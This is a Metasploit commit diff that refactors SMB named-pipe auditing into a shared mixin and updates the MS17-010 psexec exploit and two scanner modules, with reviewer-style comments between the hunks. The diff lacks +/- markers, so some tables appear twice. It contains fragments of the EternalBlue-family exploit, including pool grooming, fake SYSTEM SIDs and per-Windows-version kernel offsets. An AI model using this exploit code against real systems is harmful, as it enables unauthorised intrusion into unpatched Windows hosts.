Land #9618, pipe auditing improvements

4.x
William Vu 2018-03-26 17:01:48 -05:00 committed by Jeffrey Martin
parent 72d2b46ac8
commit c31a8ab687
No known key found for this signature in database
GPG Key ID: 0CD9BBC2AF15F171
6 changed files with 316 additions and 291 deletions


@ -0,0 +1,25 @@
netlogon
lsarpc
samr
browser
atsvc
DAV RPC SERVICE
epmapper
eventlog
InitShutdown
keysvc
lsass
LSM_API_service
ntsvcs
plugplay
protected_storage
router
SapiServerPipeS-1-5-5-0-70123
scerpc
srvsvc
tapsrv
trkwks
W32TIME_ALT
wkssvc
PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
db2remotecmd


@ -32,6 +32,7 @@ require 'msf/core/exploit/smb/client'
require 'msf/core/exploit/smb/client/authenticated'
require 'msf/core/exploit/smb/client/local_paths'
require 'msf/core/exploit/smb/client/psexec'
require 'msf/core/exploit/smb/client/pipe_auditor'
require 'msf/core/exploit/smb/client/psexec_ms17_010'
require 'msf/core/exploit/smb/client/remote_paths'
require 'msf/core/exploit/smb/server'


@ -0,0 +1,61 @@
# -*- coding: binary -*-
#
# This mixin implements the pipe_auditor module's primary functionality
#
module Msf
module Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Exploit::Remote::SMB::Client
def initialize(info = {})
super
named_pipes = File.join(Msf::Config.data_directory, 'wordlists', 'named_pipes.txt')
register_options([
OptPath.new('NAMED_PIPES', [true, 'List of named pipes to check', named_pipes])
])
end
# Check named pipes, returning the first optionally
#
# @param check_first [Array] Check the specified pipes first
# @param return_first [Boolean] Return the first pipe name and handle
# @return [Array] The list of found pipes (name and handle)
def check_named_pipes(check_first: [], return_first: false)
@found_pipes = []
if check_first.is_a?(Array)
check_first.delete_if { |pipe| pipe.blank? }
elsif check_first.is_a?(String) && check_first.present?
check_first = [check_first]
else
check_first = []
end
named_pipes = check_first + File.readlines(datastore['NAMED_PIPES'])
named_pipes.each do |pipe|
begin
pipe_name = pipe.strip
pipe_handle = self.simple.create_pipe(pipe_name, 'o')
# If we make it this far, it succeeded
vprint_status("Connected to named pipe: #{pipe_name}")
# This is for exploits like ms17_010_psexec
return pipe_name, pipe_handle if return_first
@found_pipes << [pipe_name, pipe_handle]
rescue Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("Inaccessible named pipe: #{pipe_name} - #{e.message}")
end
end
@found_pipes
end
end
end
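Review bot: In check_named_pipes the wordlist is not filtered the way check_first is: a blank line in NAMED_PIPES becomes `''` after strip and is still handed to create_pipe, and a pipe present both in check_first and in the file is tried twice; `named_pipes = (check_first + File.readlines(datastore['NAMED_PIPES'])).map(&:strip).reject(&:empty?).uniq` covers both cases in one place. `check_first.delete_if { |pipe| pipe.blank? }` also mutates the caller's array in place, which `check_first = check_first.reject(&:blank?)` avoids. The docstring should state the two result shapes: with `return_first: true` the method returns a single `[name, handle]` pair, or `[]` when nothing was accessible (so a destructuring caller receives nils), and otherwise an array of pairs whose handles remain open until the caller closes them or disconnects.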


@ -1,8 +1,8 @@
module Msf
module Exploit::Remote::SMB::Client::Psexec_MS17_010
include Msf::Exploit::Remote::SMB::Client::Psexec
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
@ -231,7 +231,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
return userAndGroupsAddr, userAndGroupCount
end
def write_what_where(what, where)
if where == 0
raise MS17_010_Error, 'Attempted to write to a NULL pointer!'
@ -331,26 +330,17 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
end
end
def find_accessible_named_pipe()
pipes = if datastore['NAMEDPIPE'] != '' then [datastore['NAMEDPIPE']] else @@target_pipes end
def find_accessible_named_pipe
@ctx['pipe_name'], pipe_handle = check_named_pipes(
check_first: datastore['NAMEDPIPE'],
return_first: true
)
pipes.each do |pipe|
begin
pipe_name = "#{pipe}"
pipe_handle = self.simple.create_pipe(pipe_name, 'o')
# if we make it this far, it succeeded
vprint_status("Connected to named pipe: #{pipe}")
@ctx['pipe_name'] = pipe_name
return pipe_handle
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
vprint_error("Inaccessible named pipe: #{pipe} - #{e.message}")
end
if @ctx['pipe_name'] && pipe_handle
pipe_handle
else
raise MS17_010_Error, 'Unable to find accessible named pipe!'
end
raise MS17_010_Error, "Unable to find accessible named pipe!"
end
# todo: spice it up with EternalSynergy output
@ -368,7 +358,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
# groom: srv buffer header
@ctx['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + @ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'], @ctx['POOL_ALIGN'])
# groom paramters and data is alignment by 8 because it is NT_TRANS
@ctx['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - @ctx['TRANS_SIZE'] # alignment (4)
@ -376,7 +365,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
bridePoolSize = 0x1000 - (@ctx['GROOM_POOL_SIZE'] & 0xfff) - @ctx['FRAG_POOL_SIZE']
@ctx['BRIDE_TRANS_SIZE'] = bridePoolSize - (@ctx['SRV_BUFHDR_SIZE'] + @ctx['POOL_ALIGN'])
if datastore['DBGTRACE']
print_status("GROOM_POOL_SIZE: 0x#{@ctx['GROOM_POOL_SIZE'].to_s(16)}")
print_status("BRIDE_TRANS_SIZE: 0x#{@ctx['BRIDE_TRANS_SIZE'].to_s(16)}")
@ -391,7 +379,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
for i in 0..datastore['LEAKATTEMPTS']
reset_extra_multiplex_id()
vprint_status("Attempting leak ##{i.to_s}")
leakInfo = align_transaction_and_leak(pipe_handle)
@ -416,7 +403,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
pipe_handle = self.simple.create_pipe(@ctx['pipe_name'], 'o')
end
@ctx['fid'] = pipe_handle.file_id
@ctx['pipe_handle'] = pipe_handle
@ctx = @ctx.merge(leakInfo)
@ -699,7 +685,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
end
if not success
print_status("<---------------- | Leaving Danger Zone | ---------------->")
raise MS17_010_Error, "Unable to control groom transaction"
@ -823,7 +808,6 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
@ctx['trans2_addr'] = trans2_addr
end
def create_fake_SYSTEM_UserAndGroups(userAndGroupCount, userAndGroupsAddr)
xSID_SYSTEM = "\x01\x01\x00\x00\x00\x00\x00\x05\x12\x00\x00\x00" # pack('<BB5xB'+'I', 1, 1, 5, 18)
xSID_ADMINISTRATORS = "\x01\x02\x00\x00\x00\x00\x00\x05\x20\x00\x00\x00\x20\x02\x00\x00" #pack('<BB5xB'+'II', 1, 2, 5, 32, 544)
@ -1182,254 +1166,222 @@ module Exploit::Remote::SMB::Client::Psexec_MS17_010
return (size + align_size - 1) & ~(align_size - 1)
end
WIN7_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xa0,
'SESSION_ISNULL_OFFSET'=> 0xba,
'FAKE_SECCTX'=> [0x28022a, 1, 0, 0, 2, 0, 1].pack("VVQ<Q<VVC"), #pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x28,
}
# we will iter these if one is not specified
@@target_pipes = [
'netlogon',
'lsarpc',
'samr',
'browser',
'atsvc',
'DAV RPC SERVICE',
'epmapper',
'eventlog',
'InitShutdown',
'keysvc',
'lsass',
'LSM_API_service',
'ntsvcs',
'plugplay',
'protected_storage',
'router',
'SapiServerPipeS-1-5-5-0-70123',
'scerpc',
'srvsvc',
'tapsrv',
'trkwks',
'W32TIME_ALT',
'wkssvc',
'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
'db2remotecmd'
]
WIN7_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x80,
'SESSION_ISNULL_OFFSET'=> 0x96,
'FAKE_SECCTX'=> [0x1c022a, 1, 0, 0, 2, 0, 1].pack("VVVVVVC"), #pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x1c,
}
WIN7_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xa0,
'SESSION_ISNULL_OFFSET'=> 0xba,
'FAKE_SECCTX'=> [0x28022a, 1, 0, 0, 2, 0, 1].pack("VVQ<Q<VVC"), #pack('<IIQQIIB', 0x28022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x28,
}
# win8+ info
WIN8_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xb0,
'SESSION_ISNULL_OFFSET'=> 0xca,
'FAKE_SECCTX'=> [0x38022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVQ<Q<Q<Q<VVC"), #pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x38,
}
WIN7_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x80,
'SESSION_ISNULL_OFFSET'=> 0x96,
'FAKE_SECCTX'=> [0x1c022a, 1, 0, 0, 2, 0, 1].pack("VVVVVVC"), #pack('<IIIIIIB', 0x1c022a, 1, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x1c,
}
WIN8_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x88,
'SESSION_ISNULL_OFFSET'=> 0x9e,
'FAKE_SECCTX'=> [0x24022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVVVVVVVC"), # pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x24,
}
# win8+ info
WIN8_64_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0xb0,
'SESSION_ISNULL_OFFSET'=> 0xca,
'FAKE_SECCTX'=> [0x38022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVQ<Q<Q<Q<VVC"), #pack('<IIQQQQIIB', 0x38022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x38,
}
# win 2003 (xp 64 bit is win 2003)
WIN2K3_64_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0xba,
'SESSION_SECCTX_OFFSET'=> 0xa0, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0x10, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x40,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
WIN8_32_SESSION_INFO = {
'SESSION_SECCTX_OFFSET'=> 0x88,
'SESSION_ISNULL_OFFSET'=> 0x9e,
'FAKE_SECCTX'=> [0x24022a, 1, 0, 0, 0, 0, 2, 0, 1].pack("VVVVVVVVC"), # pack('<IIIIIIIIB', 0x24022a, 1, 0, 0, 0, 0, 2, 0, 1),
'SECCTX_SIZE'=> 0x24,
}
WIN2K3_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x96,
'SESSION_SECCTX_OFFSET'=> 0x80, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0xc, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
# win 2003 (xp 64 bit is win 2003)
WIN2K3_64_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0xba,
'SESSION_SECCTX_OFFSET'=> 0xa0, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0x10, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x40,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
# win xp
WINXP_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
}
WIN2K3_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x96,
'SESSION_SECCTX_OFFSET'=> 0x80, # Win2k3 has another struct to keep PCtxtHandle (similar to 2008+)
'SECCTX_PCTXTHANDLE_OFFSET'=> 0xc, # PCtxtHandle is at offset 0x8 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
}
WIN2K_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x3c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x58,
}
# win xp
WINXP_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x4c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x68,
'TOKEN_USER_GROUP_CNT_OFFSET_SP0_SP1'=> 0x40,
'TOKEN_USER_GROUP_ADDR_OFFSET_SP0_SP1'=> 0x5c,
}
# for windows 2008+
WIN7_32_TRANS_INFO = {
'TRANS_SIZE' => 0xa0, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x40,
'TRANS_OUTPARAM_OFFSET' => 0x44,
'TRANS_INDATA_OFFSET' => 0x48,
'TRANS_OUTDATA_OFFSET' => 0x4c,
'TRANS_PARAMCNT_OFFSET' => 0x58,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x5c,
'TRANS_FUNCTION_OFFSET' => 0x72,
'TRANS_MID_OFFSET' => 0x80,
}
WIN2K_32_SESSION_INFO = {
'SESSION_ISNULL_OFFSET'=> 0x94,
'SESSION_SECCTX_OFFSET'=> 0x84, # PCtxtHandle is at offset 0x80 but only upperPart is needed
'PCTXTHANDLE_TOKEN_OFFSET'=> 0x24,
'TOKEN_USER_GROUP_CNT_OFFSET'=> 0x3c,
'TOKEN_USER_GROUP_ADDR_OFFSET'=> 0x58,
}
WIN7_64_TRANS_INFO = {
'TRANS_SIZE' => 0xf8, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x70,
'TRANS_OUTPARAM_OFFSET' => 0x78,
'TRANS_INDATA_OFFSET' => 0x80,
'TRANS_OUTDATA_OFFSET' => 0x88,
'TRANS_PARAMCNT_OFFSET' => 0x98,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x9c,
'TRANS_FUNCTION_OFFSET' => 0xb2,
'TRANS_MID_OFFSET' => 0xc0,
}
# for windows 2008+
WIN7_32_TRANS_INFO = {
'TRANS_SIZE' => 0xa0, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x40,
'TRANS_OUTPARAM_OFFSET' => 0x44,
'TRANS_INDATA_OFFSET' => 0x48,
'TRANS_OUTDATA_OFFSET' => 0x4c,
'TRANS_PARAMCNT_OFFSET' => 0x58,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x5c,
'TRANS_FUNCTION_OFFSET' => 0x72,
'TRANS_MID_OFFSET' => 0x80,
}
WIN5_32_TRANS_INFO = {
'TRANS_SIZE' => 0x98, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x3c,
'TRANS_OUTPARAM_OFFSET' => 0x40,
'TRANS_INDATA_OFFSET' => 0x44,
'TRANS_OUTDATA_OFFSET' => 0x48,
'TRANS_PARAMCNT_OFFSET' => 0x54,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x58,
'TRANS_FUNCTION_OFFSET' => 0x6e,
'TRANS_PID_OFFSET' => 0x78,
'TRANS_MID_OFFSET' => 0x7c,
}
WIN7_64_TRANS_INFO = {
'TRANS_SIZE' => 0xf8, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x70,
'TRANS_OUTPARAM_OFFSET' => 0x78,
'TRANS_INDATA_OFFSET' => 0x80,
'TRANS_OUTDATA_OFFSET' => 0x88,
'TRANS_PARAMCNT_OFFSET' => 0x98,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x9c,
'TRANS_FUNCTION_OFFSET' => 0xb2,
'TRANS_MID_OFFSET' => 0xc0,
}
WIN5_64_TRANS_INFO = {
'TRANS_SIZE' => 0xe0, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x68,
'TRANS_OUTPARAM_OFFSET' => 0x70,
'TRANS_INDATA_OFFSET' => 0x78,
'TRANS_OUTDATA_OFFSET' => 0x80,
'TRANS_PARAMCNT_OFFSET' => 0x90,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x94,
'TRANS_FUNCTION_OFFSET' => 0xaa,
'TRANS_PID_OFFSET' => 0xb4,
'TRANS_MID_OFFSET' => 0xb8,
}
WIN5_32_TRANS_INFO = {
'TRANS_SIZE' => 0x98, # struct size
'TRANS_FLINK_OFFSET' => 0x18,
'TRANS_INPARAM_OFFSET' => 0x3c,
'TRANS_OUTPARAM_OFFSET' => 0x40,
'TRANS_INDATA_OFFSET' => 0x44,
'TRANS_OUTDATA_OFFSET' => 0x48,
'TRANS_PARAMCNT_OFFSET' => 0x54,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x58,
'TRANS_FUNCTION_OFFSET' => 0x6e,
'TRANS_PID_OFFSET' => 0x78,
'TRANS_MID_OFFSET' => 0x7c,
}
X86_INFO = {
'ARCH' => 'x86',
'PTR_SIZE' => 4,
'PTR_FMT' => 'V',
'FRAG_TAG_OFFSET' => 12,
'POOL_ALIGN' => 8,
'SRV_BUFHDR_SIZE' => 8,
}
WIN5_64_TRANS_INFO = {
'TRANS_SIZE' => 0xe0, # struct size
'TRANS_FLINK_OFFSET' => 0x28,
'TRANS_INPARAM_OFFSET' => 0x68,
'TRANS_OUTPARAM_OFFSET' => 0x70,
'TRANS_INDATA_OFFSET' => 0x78,
'TRANS_OUTDATA_OFFSET' => 0x80,
'TRANS_PARAMCNT_OFFSET' => 0x90,
'TRANS_TOTALPARAMCNT_OFFSET' => 0x94,
'TRANS_FUNCTION_OFFSET' => 0xaa,
'TRANS_PID_OFFSET' => 0xb4,
'TRANS_MID_OFFSET' => 0xb8,
}
X64_INFO = {
'ARCH' => 'x64',
'PTR_SIZE' => 8,
'PTR_FMT' => 'Q<',
'FRAG_TAG_OFFSET' => 0x14,
'POOL_ALIGN' => 0x10,
'SRV_BUFHDR_SIZE' => 0x10,
}
X86_INFO = {
'ARCH' => 'x86',
'PTR_SIZE' => 4,
'PTR_FMT' => 'V',
'FRAG_TAG_OFFSET' => 12,
'POOL_ALIGN' => 8,
'SRV_BUFHDR_SIZE' => 8,
}
X64_INFO = {
'ARCH' => 'x64',
'PTR_SIZE' => 8,
'PTR_FMT' => 'Q<',
'FRAG_TAG_OFFSET' => 0x14,
'POOL_ALIGN' => 0x10,
'SRV_BUFHDR_SIZE' => 0x10,
}
OS_ARCH_INFO = {
# for Windows Vista, 2008, 7 and 2008 R2
'WIN7' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN7_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN7_64_SESSION_INFO
},
OS_ARCH_INFO = {
# for Windows Vista, 2008, 7 and 2008 R2
'WIN7' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN7_32_SESSION_INFO
},
# for Windows 8 and later
'WIN8' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN8_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN8_64_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN7_64_SESSION_INFO
},
'WINXP' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WINXP_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
# for Windows 8 and later
'WIN8' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN7_32_TRANS_INFO,
'SESSION' => WIN8_32_SESSION_INFO
},
'WIN2K3' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K3_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN7_64_TRANS_INFO,
'SESSION' => WIN8_64_SESSION_INFO
},
'WIN2K' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K_32_SESSION_INFO
},
},
'WINXP' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WINXP_32_SESSION_INFO
},
}
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K3' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K3_32_SESSION_INFO
},
'x64' => {
'CPUARCH' => X64_INFO,
'OFFSETS' => WIN5_64_TRANS_INFO,
'SESSION' => WIN2K3_64_SESSION_INFO
},
},
'WIN2K' => {
'x86' => {
'CPUARCH' => X86_INFO,
'OFFSETS' => WIN5_32_TRANS_INFO,
'SESSION' => WIN2K_32_SESSION_INFO
},
},
}
def pick_ctx()
pick = OS_ARCH_INFO[@ctx['os']][@ctx['arch']]
@ctx = @ctx.merge(pick['CPUARCH'])
@ctx = @ctx.merge(pick['OFFSETS'])
@ctx = @ctx.merge(pick['SESSION'])
@ctx
end
def pick_ctx()
pick = OS_ARCH_INFO[@ctx['os']][@ctx['arch']]
@ctx = @ctx.merge(pick['CPUARCH'])
@ctx = @ctx.merge(pick['OFFSETS'])
@ctx = @ctx.merge(pick['SESSION'])
@ctx
end
GROOM_TRANS_SIZE = 0x5010 # includes transaction name, parameters and data, multiple of 16 to make FRAG_TAG_OFFSET valid
TRANS_NAME_LEN = 4
GROOM_TRANS_SIZE = 0x5010 # includes transaction name, parameters and data, multiple of 16 to make FRAG_TAG_OFFSET valid
TRANS_NAME_LEN = 4
X64_FRAG_TAG_OFFSET = 0x14
X64_POOL_ALIGN = 0x10
X64_FRAG_TAG_OFFSET = 0x14
X64_POOL_ALIGN = 0x10
X86_FRAG_TAG_OFFSET = 0x0c
X86_POOL_ALIGN = 0x08
X86_FRAG_TAG_OFFSET = 0x0c
X86_POOL_ALIGN = 0x08
end
end
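Review bot: In the find_accessible_named_pipe hunk the meaning of NAMEDPIPE changes silently: the old code tried only that pipe when it was non-empty, while `check_named_pipes(check_first: datastore['NAMEDPIPE'], return_first: true)` tries it first and then falls through to every entry in the NAMED_PIPES wordlist, so an operator who set NAMEDPIPE to limit connection attempts now gets the whole list probed on failure. If the fallback is intended, it should be stated next to the call, e.g. `# NAMEDPIPE is tried first; if it fails every pipe in NAMED_PIPES is attempted`, and reflected in the option description. Note also that `@ctx['pipe_name']` is assigned before the result is validated, so it is set to nil on the failure path just before the raise; assigning into `@ctx` only inside the success branch keeps the context clean for any rescue further up. The remaining hunks of this file are the removal of the `@@target_pipes` class variable and a reordering of the constant tables, which this note does not touch.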


@ -8,6 +8,7 @@ class MetasploitModule < Msf::Auxiliary
# Exploit mixins should be called first
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
# Scanner mixin should be near last
include Msf::Auxiliary::Scanner
@ -24,34 +25,6 @@ class MetasploitModule < Msf::Auxiliary
deregister_options('RPORT')
end
@@target_pipes = [
'netlogon',
'lsarpc',
'samr',
'browser',
'atsvc',
'DAV RPC SERVICE',
'epmapper',
'eventlog',
'InitShutdown',
'keysvc',
'lsass',
'LSM_API_service',
'ntsvcs',
'plugplay',
'protected_storage',
'router',
'SapiServerPipeS-1-5-5-0-70123',
'scerpc',
'srvsvc',
'tapsrv',
'trkwks',
'W32TIME_ALT',
'wkssvc',
'PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER',
'db2remotecmd'
]
# Fingerprint a single host
def run_host(ip)
@ -65,14 +38,8 @@ class MetasploitModule < Msf::Auxiliary
begin
connect()
smb_login()
@@target_pipes.each do |pipe|
begin
fid = smb_create("\\#{pipe}")
#print_status("Opened pipe \\#{pipe}")
pass.push(pipe)
rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
#print_error("Could not open \\#{pipe}: Error 0x%.8x" % e.error_code)
end
check_named_pipes.each do |pipe_name, _|
pass.push(pipe_name)
end
disconnect()
@ -85,14 +52,14 @@ class MetasploitModule < Msf::Auxiliary
end
if(pass.length > 0)
print_status("Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}")
print_good("Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}")
# Add Report
report_note(
:host => ip,
:proto => 'tcp',
:sname => 'smb',
:port => rport,
:type => 'Pipes Founded',
:type => 'Pipes Found',
:data => "Pipes: #{pass.map{|c| "\\#{c}"}.join(", ")}"
)
end
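Review bot: In run_host the handles returned by check_named_pipes are dropped with `|pipe_name, _|` and stay open until disconnect; if the OpenFile handle exposes `close`, closing each one in the loop would release them as soon as the name is recorded, otherwise a comment saying the handles are intentionally left to disconnect would help the next reader. The reporting hunk builds `pass.map{|c| "\\#{c}"}.join(", ")` twice, once for print_good and once for report_note; hoisting it into `pipes = pass.map { |c| "\\#{c}" }.join(', ')` and guarding with `unless pass.empty?` instead of `if(pass.length > 0)` reads more idiomatically. Changing the note type from 'Pipes Founded' to 'Pipes Found' is correct, but anything that queried notes by the old type string will no longer match existing data. run_host starts before the first hunk of this section.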


@ -7,6 +7,7 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DCERPC
include Msf::Exploit::Remote::SMB::Client
include Msf::Exploit::Remote::SMB::Client::Authenticated
include Msf::Exploit::Remote::SMB::Client::PipeAuditor
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
@ -51,8 +52,9 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptBool.new('CHECK_DOPU', [true, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),
OptBool.new('CHECK_ARCH', [true, 'Check for architecture on vulnerable hosts', true])
OptBool.new('CHECK_DOPU', [false, 'Check for DOUBLEPULSAR on vulnerable hosts', true]),
OptBool.new('CHECK_ARCH', [false, 'Check for architecture on vulnerable hosts', true]),
OptBool.new('CHECK_PIPE', [false, 'Check for named pipe on vulnerable hosts', false])
])
end
@ -113,6 +115,23 @@ class MetasploitModule < Msf::Auxiliary
)
end
end
if datastore['CHECK_PIPE']
pipe_name, _ = check_named_pipes(return_first: true)
return unless pipe_name
print_good("Named pipe found: #{pipe_name}")
report_note(
host: ip,
port: rport,
proto: 'tcp',
sname: 'smb',
type: 'MS17-010 Named Pipe',
data: pipe_name
)
end
elsif status == "STATUS_ACCESS_DENIED" or status == "STATUS_INVALID_HANDLE"
# STATUS_ACCESS_DENIED (Windows 10) and STATUS_INVALID_HANDLE (others)
print_error("Host does NOT appear vulnerable.")
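Review bot: `return unless pipe_name` inside the `if datastore['CHECK_PIPE']` block exits the whole enclosing method, not just the pipe check, so when no pipe is accessible anything that follows the if/elsif chain in the method (cleanup, further reporting) is skipped on a host that was already reported vulnerable. Wrapping the success path instead, replacing `return unless pipe_name` with `if pipe_name` and adding a matching `end` after the `report_note(...)` call, keeps control flow local to the check. The enclosing if/elsif chain and the method itself begin and end outside the hunk, so what is skipped cannot be confirmed from here. As with the other callers, the handle from `check_named_pipes(return_first: true)` is discarded and left open until disconnect.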